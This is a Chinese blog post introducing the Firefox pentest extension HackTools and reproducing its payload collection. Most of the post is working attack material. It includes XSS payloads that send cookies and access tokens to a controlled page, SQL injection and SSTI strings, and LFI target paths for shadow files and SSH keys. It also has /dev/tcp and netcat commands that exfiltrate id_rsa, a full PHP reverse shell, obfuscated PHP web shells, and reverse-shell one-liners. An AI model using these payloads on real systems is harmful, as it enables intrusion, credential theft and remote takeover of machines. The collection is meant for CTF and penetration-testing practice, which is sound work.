PJzhang:Firefox渗透测试插件HackTools样例

猫宁~~~

firefox插件hacktools地址：

https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/

HackTools由Ludovic Coulon和Riadh BoUCHAHOUA创建。

这是他们插件制作的初衷：

我们是两个对计算机安全非常感兴趣的学生，这个想法是在我们的CTF培训期间出现的，我们注意到我们经常使用相同的工具(绘制一个shell，用php反向shell，Base64编码等等)，这就是当我们想到将大多数工具和有效负载组合在一个地方的想法时，一个简单的Web应用程序就可以完成这项工作，但是来回移动相当令人沮丧，这就是为什么我们想直接在浏览器中实现一个扩展

由此，我们可以知道，一个渗透测试工具的目的，是提高生产力，有的时候，一种聚合也是一种创新。

1~xss相关payload

Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

XSS in HTML/Applications

Basic Payload

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

Img tag payload

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

XSS in Markdown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

XSS in SVG (short)

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;

2~sql注入payload

Generic SQL Injection Payloads

' or '

-- or #

' OR '1

' OR 1 -- - 

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

Time-Based

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

Generic Error Based Payloads

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

Authentication Based Payloads

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

Order by and UNION Based Payloads

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

3~Template Injections (SSTI)，模板注入

Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Jinja2 ( Flask / Django )

File reading

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

 

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

Write into a file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

 

4~LFI，本地文件包含

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server.

Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Directory traversal

foo.php?file=../../../../../../../etc/passwd

PHP Wrapper php://file

/example1.php?page=expect://ls

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

Useful LFI files

Linux

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/root/.ssh/id_rsa

/root/.ssh/authorized_keys

/home/user/.ssh/authorized_keys

/home/user/.ssh/id_rsa

/proc/[0-9]*/fd/[0-9]*

/proc/mounts

/home/$USER/.bash_history

/home/$USER/.ssh/id_rsa

/var/run/secrets/kubernetes.io/serviceaccount

/var/lib/mlocate/mlocate.db

/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf

/usr/local/etc/apache2/httpd.conf

/etc/httpd/conf/httpd.conf

Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log

Debian/Ubuntu -> /var/log/apache2/access.log

FreeBSD -> /var/log/httpd-access.log

/var/log/apache/access.log

/var/log/apache/error.log

/var/log/apache2/access.log

/var/log/apache/error.log

MySQL

/var/lib/mysql/mysql/user.frm

/var/lib/mysql/mysql/user.MYD

/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini

/autoexec.bat

/windows/system32/drivers/etc/hosts

/windows/repair/SAM

/windows/panther/unattended.xml

/windows/panther/unattend/unattended.xml

/windows/system32/license.rtf

/windows/system32/eula.txt

 

5~File Transfer，文件传递

Bash Upload

# Upload file over HTTP (require HTTP service running on the attacker machine)

bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'

# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection

nc -l -p 1337 > data

bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

Bash Download

# Send via netcat

nc -l -p 1337 < id_rsa

# Download file on the other machine

bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

Netcat

# Upload payload

nc -lnvp 1337

nc 10.10.164.167 1337 < id_rsa

# Download

nc 10.10.164.167 1337 < id_rsa

nc -lnvp 1337 > file_saved

Python

# Python3 HTTP Server

python3 -m http.server 1337

# Python2 HTTP Server

python -m SimpleHTTPServer 1337

SCP

# Upload from local host to remote computer

scp id_rsa username@10.10.164.167:~/destination -P 1337

# Download from remote computer

scp user@10.10.164.167:~/path_to_file file_saved -P 1337

 

6~Useful Linux command for your Penetration Testing

SUID Commands

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -type f -name '*.txt' 2>/dev/null

What version of the system ?

cat /etc/issue

cat /etc/*-release 

cat /etc/lsb-release

cat /etc/redhat-release

What is its kernel version ?

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz

What is the environment variables ?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

Service settings, there is any wrong allocation?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Is there any cron jobs ?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Other users host communication with the system ?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

last

How to port forwarding ?

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpi...

backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc

localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

TAR wildcard cronjob privilege escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

 

7~TTY Spawn Shell

 

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

Fully Interactive TTY

All the steps to stabilize your shell

# In the reverse shell

python -c 'import pty; pty.spawn("/bin/sh")'

ctrl+z

# Attacker Machine

stty raw -echo

fg

# In the reverse shell

reset

export SHELL=bash

export TERM=xterm-256color

stty rows [num] columns [cols]

OS system spawn shell

echo os.system("/bin/bash")

Bash spawn shell

/bin/sh -i

Perl spawn shell

perl —e 'exec "/bin/sh";'

Python spawn shell

ruby: exec "/bin/sh"

Lua spawn shell

lua: os.execute("/bin/sh")

IRB spawn shell

exec "/bin/sh"

VI spawn shell

:!bash

VI(2) spawn shell

:set shell=/bin/bash:shell

Nmap spawn shell

!sh

 

8~PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.

Pentestmonkey's reverse shell

This script will make an outbound TCP connection to a hardcoded IP and port

  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '';  // You have changed this
  $port = ;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }

    if ($pid) {
      exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }

    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }

  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }

  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }

  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }

  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    if (!$daemon) {
      print "$string
";
    }
  }

  ?>
  

Basic RCE

When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")

<?php system($_GET["cmd"]);?

Obfuscate PHP Web Shell

<?=`$_GET[0]`?> 

Usage : http://target.com/path/to/shell.php?0=command

 

<?=`$_POST[0]`?>

Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"

 

<?=`{$_REQUEST['_']}`?>

Usage :

- http://target.com/path/to/shell.php?_=command

- curl -X POST http://target.com/path/to/shell.php -d "_=command" '

 

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

Usage :

- http://target.com/path/to/shell.php?0=command

 

<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>

Usage :

- http://target.com/path/to/shell.php?_=function&__=argument

- http://target.com/path/to/shell.php?_=system&__=ls

9~Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.

bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f

php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF

over~~~